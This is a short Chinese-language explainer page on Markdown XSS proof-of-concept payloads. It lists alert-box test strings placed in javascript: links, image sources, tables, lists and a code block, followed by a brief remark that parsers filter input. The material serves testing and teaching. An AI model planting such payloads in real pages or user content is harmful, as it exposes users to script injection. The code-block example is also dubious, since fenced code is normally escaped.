markdown xss poc
时间: 2024-12-12 19:12:46 浏览: 10
Markdown XSS POC(Proof of Concept)是指在Markdown格式的文档中嵌入恶意代码,以测试或展示Markdown解析器是否存在跨站脚本攻击(XSS)漏洞。XSS攻击是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本,使得用户在浏览网页时执行这些脚本,从而达到窃取用户信息、劫持用户会话等目的。
以下是一些常见的Markdown XSS POC示例:
1. **链接中的XSS**:
```markdown
[点击这里](javascript:alert('XSS'))
```
2. **图片标签中的XSS**:
```markdown
![alt text](javascript:alert('XSS'))
```
3. **表格中的XSS**:
```markdown
| <script>alert('XSS')</script> |
| -------------------------------|
```
4. **代码块中的XSS**:
```markdown
```html
<script>alert('XSS')</script>
```
```
5. **列表中的XSS**:
```markdown
- <script>alert('XSS')</script>
- 第二项
```
这些示例展示了如何在Markdown文档中嵌入恶意脚本,以测试解析器是否存在XSS漏洞。为了防止XSS攻击,Markdown解析器通常会对输入进行过滤和转义,阻止恶意代码的执行。
阅读全文